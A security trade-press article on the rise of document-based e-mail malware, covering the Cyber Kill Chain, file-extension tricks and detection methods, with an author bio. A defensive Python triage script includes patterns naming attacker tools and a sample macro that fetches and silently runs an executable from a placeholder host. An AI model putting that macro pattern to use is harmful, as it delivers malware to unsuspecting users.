Barracuda Networks urges businesses to guard against evolving malware attacks

Barracuda Networks researchers have uncovered an alarming new rise in the use of document-based malware. A recent e-mail analysis revealed that 48% of all malicious files detected in the last 12 months were some kind of document. More than 300,000 unique malicious documents were identified.

Since the beginning of 2019, however, document-based attacks have grown sharply in frequency. In the first quarter of the year, 59% of all malicious files detected were documents, compared with 41% across 2018.

Cyber criminals use e-mail to deliver a document containing malicious software, also known as malware. Typically, either the malware is hidden directly in the document itself or an embedded script downloads it from an external website. Common types of malware include viruses, trojans, spyware, worms and ransomware.

For decades the industry relied on signature-based methods, which can only stop a malware strain once a signature has been derived from a sample of it. Security companies now approach malware detection by asking “What makes something malicious?” rather than “How do I detect things I already know are malicious?” The focus is on detecting indicators that a file might do harm before it has been labelled as harmful.

The Cyber Kill Chain

A common model used to better understand attacks is the Cyber Kill Chain, a seven-phase model of the steps most attackers take to breach a system:

*Reconnaissance: Target selection and research

*Weaponisation: Crafting the attack on the target, often using malware and/or exploits

*Delivery: Launching the attack

*Exploitation: Triggering the exploit (or the user action) delivered in the attack package so that attacker code runs on the target

*Installation: Creating persistence within the target’s system

*Command and Control: Remotely controlling the compromised system from outside the network through the persistence just established

*Actions on objective: Achieving the objective that was the purpose of the attack (often exfiltration of data)

Most malware is sent as spam to widely circulated e-mail lists that are sold, traded, aggregated and revised as they move through the Dark Web. Combo lists like those used in the ongoing sextortion scams are a good example of this sort of list aggregation and usage in action.

Now that the attacker has a list of potential victims, the malware campaign (i.e. the delivery phase of the Cyber Kill Chain) can commence, using social engineering to entice users to open an attached malicious document. Microsoft Office files (Word, Excel and PowerPoint) and Adobe PDF files are the types most commonly used in document-based malware attacks.

Once the document is opened, either the malware is installed directly or a heavily obfuscated macro/script downloads and installs it from an external source. Because current versions of Office disable macros by default and show a warning bar, the lure usually instructs the victim to click “Enable Content”, so a document asking for that is itself a warning sign. Occasionally, a link or other clickable item is used, but that approach is much more common in phishing attacks than in malware attacks. The executable being downloaded and run when the malicious document is opened represents the installation phase of the Cyber Kill Chain.

Archive files and script files are the other two most common attachment-based distribution methods for malware. Attackers often play tricks with file extensions to confuse users and cajole them into opening malicious attachments: a double extension such as invoice.pdf.exe is displayed as invoice.pdf when Windows hides known extensions, and long runs of spaces or a right-to-left override character can push the real extension out of view.

Detection and blocking

Modern malware attacks are complex and layered, as are the solutions designed to detect and block them.

*Blacklists: With IPv4 address space increasingly scarce, spammers are sending more of their traffic from their own infrastructure, and the same IPs are often used for long enough to be detected and blacklisted. Even with hacked sites and botnets, it’s possible to temporarily block attacks by IP once a large enough volume of spam has been detected from it.

*Spam filters/phishing detection systems: While many malicious e-mails appear convincing, spam filters, phishing detection systems and related security software can pick up subtle clues and help to block potentially threatening messages and attachments from reaching e-mail inboxes.

*Malware detection: For e-mails with malicious documents attached, both static and dynamic analysis can pick up indicators that the document is trying to download and run an executable, which no legitimate document should ever do. The URL the executable is fetched from can often be flagged using heuristics or threat-intelligence feeds, and obfuscation found by static analysis (characters assembled with Chr(), strings split and concatenated, reversed or encoded strings) is itself a strong hint that a document is suspicious.

*Advanced firewall: If a user opens a malicious attachment or clicks a link to a drive-by download, an advanced network firewall capable of malware analysis provides a chance to stop the attack by flagging the executable as it tries to pass through.
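The two detection ideas in this section, spotting file-extension tricks on the attachment name and statically scanning macro source for download-and-run behaviour plus obfuscation, can be shown in a single triage routine. The example below is added here for illustration and is not Barracuda’s detection logic or any product’s code. It assumes the macro text has already been extracted from the Office container (a tool such as oletools’ olevba does that step), the extension sets and hit-count thresholds are illustrative choices, and the sample macro is constructed for this example and points at a reserved .invalid domain.

```python
import re

# Attachment classes. Illustrative sets; tune them to your own policy.
EXECUTABLE_EXTS = {"exe", "scr", "pif", "com", "cpl", "msi", "dll"}
SCRIPT_EXTS = {"js", "jse", "vbs", "vbe", "wsf", "hta", "ps1", "bat", "cmd"}
ARCHIVE_EXTS = {"zip", "rar", "7z", "iso", "img", "cab", "ace"}
DOCUMENT_EXTS = {"doc", "docx", "docm", "xls", "xlsx", "xlsm",
                 "ppt", "pptx", "pptm", "pdf", "rtf"}
DECOY_EXTS = DOCUMENT_EXTS | {"jpg", "png", "txt"}  # what a double extension pretends to be

SEVERITY = {"info": 0, "review": 1, "block": 2}

# Static indicators that a VBA macro downloads and runs something: (regex, meaning, tag).
# The tag lets the verdict logic combine hits (download + run is the classic dropper).
MACRO_PATTERNS = [
    (r"\bAuto_?Open\b|\bDocument_Open\b|\bWorkbook_Open\b", "auto-executes when the document opens", "autoexec"),
    (r"\bShell\b|\bWScript\.Shell\b|\bShellExecute\b", "spawns a process", "run"),
    (r"\bpowershell\b|\bcmd(\.exe)?\b|\bcertutil\b|\bmshta\b|\bregsvr32\b", "invokes a living-off-the-land binary", "run"),
    (r"\bURLDownloadToFile\b|MSXML2\.XMLHTTP|WinHttp\.WinHttpRequest", "downloads from a URL", "download"),
    (r"https?://[^\s\"']+", "contains a plaintext URL", "url"),
    (r"\.(exe|dll|scr)\b", "references an executable file name", "exe"),
]

# Obfuscation tricks, with the hit count at which they start to look deliberate.
OBFUSCATION_PATTERNS = [
    (r"\bChr[WB$]?\s*\(", "Chr() character building", 5),
    (r"\"\s*&\s*\"", "string-splitting concatenation", 5),
    (r"\bStrReverse\s*\(", "StrReverse()", 1),
    (r"\bReplace\s*\(", "Replace() decoding", 3),
]


def name_indicators(filename):
    """File-name tricks: double extensions, RTL override, whitespace padding."""
    findings = []
    base = filename.rsplit("/", 1)[-1].rsplit("\\", 1)[-1]
    if "\u202e" in base:
        findings.append(("block", "right-to-left override character hides the real extension"))
    low = base.lower()
    if re.search(r"\.[a-z0-9]{2,4}\s{5,}\.[a-z0-9]{2,4}$", low):
        findings.append(("block", "whitespace padding hides the real extension"))
    exts = [e.strip() for e in low.split(".")[1:]]
    if not exts:
        return findings
    last = exts[-1]
    if len(exts) >= 2 and exts[-2] in DECOY_EXTS and last in EXECUTABLE_EXTS | SCRIPT_EXTS:
        findings.append(("block", f"double extension: looks like .{exts[-2]} but is .{last}"))
    if last in EXECUTABLE_EXTS:
        findings.append(("block", "executable attachment"))
    elif last in SCRIPT_EXTS:
        findings.append(("block", "script attachment"))
    elif last in ARCHIVE_EXTS:
        findings.append(("review", "archive attachment: inspect the contents"))
    elif last in DOCUMENT_EXTS:
        findings.append(("info", "document attachment: check for macros"))
    return findings


def macro_indicators(vba):
    """Static scan of macro source for download-and-run behaviour and obfuscation."""
    findings, tags = [], set()
    for pattern, meaning, tag in MACRO_PATTERNS:
        if re.search(pattern, vba, re.IGNORECASE):
            findings.append(("review", meaning))
            tags.add(tag)
    if "download" in tags and "run" in tags:
        findings.append(("block", "downloads a payload and executes it"))
    elif "autoexec" in tags and "run" in tags:
        findings.append(("block", "spawns a process as soon as the document opens"))
    obfuscation_hits = 0
    for pattern, meaning, threshold in OBFUSCATION_PATTERNS:
        hits = len(re.findall(pattern, vba, re.IGNORECASE))
        if hits >= threshold:
            findings.append(("review", f"obfuscation: {meaning} x{hits}"))
            obfuscation_hits += hits
    return findings, obfuscation_hits


def triage(filename, vba=""):
    """Combine name and macro indicators into a gateway verdict: allow, review or block."""
    findings = name_indicators(filename)
    obfuscation_hits = 0
    if vba:
        macro_findings, obfuscation_hits = macro_indicators(vba)
        findings += macro_findings
    worst = max((SEVERITY[s] for s, _ in findings), default=0)
    verdict = {0: "allow", 1: "review", 2: "block"}[worst]
    return {"filename": filename, "verdict": verdict,
            "obfuscation_hits": obfuscation_hits, "reasons": [m for _, m in findings]}


# Constructed sample dropper macro: the URL is split so a naive URL regex misses it,
# the file name is built with Chr(), and the download is executed via WScript.Shell.
SAMPLE_MACRO = r'''
Sub AutoOpen()
    Dim u As String, p As String
    u = "htt" & "p://" & "exam" & "ple.invalid/" & "upd" & "ate.exe"
    p = Environ("TEMP") & "\" & Chr(117) & Chr(112) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
    Set o = CreateObject("MSXML2.XMLHTTP")
    o.Open "GET", u, False
    o.Send
    Set s = CreateObject("ADODB.Stream")
    s.Write o.responseBody
    s.SaveToFile p, 2
    CreateObject("WScript.Shell").Run p, 0
End Sub
'''

if __name__ == "__main__":
    for name, vba in [("Quarterly_Report.xlsx", ""), ("Photos.zip", ""),
                      ("Invoice.pdf.exe", ""), ("Invoice_2019.docm", SAMPLE_MACRO)]:
        r = triage(name, vba)
        print(f"{r['verdict']:7} {name}: {'; '.join(r['reasons'])}")
```

Note that the plaintext-URL pattern never fires on the sample, because the attacker split the string; it is the concatenation count and the Chr() building that expose the download, which is exactly why obfuscation itself is treated as an indicator rather than as noise.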

About the Author

Brian Sims BA (Hons) Hon FSyI, Editor, Risk UK (Pro-Activ Publications)

Beginning his career in professional journalism at The Builder Group in March 1992, Brian was appointed Editor of Security Management Today in November 2000 having spent eight years in engineering journalism across two titles: Building Services Journal and Light & Lighting. In 2005, Brian received the BSIA Chairman’s Award for Promoting The Security Industry and, a year later, the Skills for Security Special Award for an Outstanding Contribution to the Security Business Sector. In 2008, Brian was The Security Institute’s nomination for the Association of Security Consultants’ highly prestigious Imbert Prize and, in 2013, was a nominated finalist for the Institute's George van Schalkwyk Award. An Honorary Fellow of The Security Institute, Brian serves as a Judge for the BSIA’s Security Personnel of the Year Awards and the Securitas Good Customer Award. Between 2008 and 2014, Brian pioneered the use of digital media across the security sector, including webinars and Audio Shows. Brian’s actively involved in 50-plus security groups on LinkedIn and hosts the popular Risk UK Twitter site. Brian is a frequent speaker on the conference circuit. He has organised and chaired conference programmes for both IFSEC International and ASIS International and has been published in the national media. Brian was appointed Editor of Risk UK at Pro-Activ Publications in July 2014 and as Editor of The Paper (Pro-Activ Publications' dedicated business newspaper for security professionals) in September 2015. Brian was appointed Editor of Risk Xtra at Pro-Activ Publications in May 2018.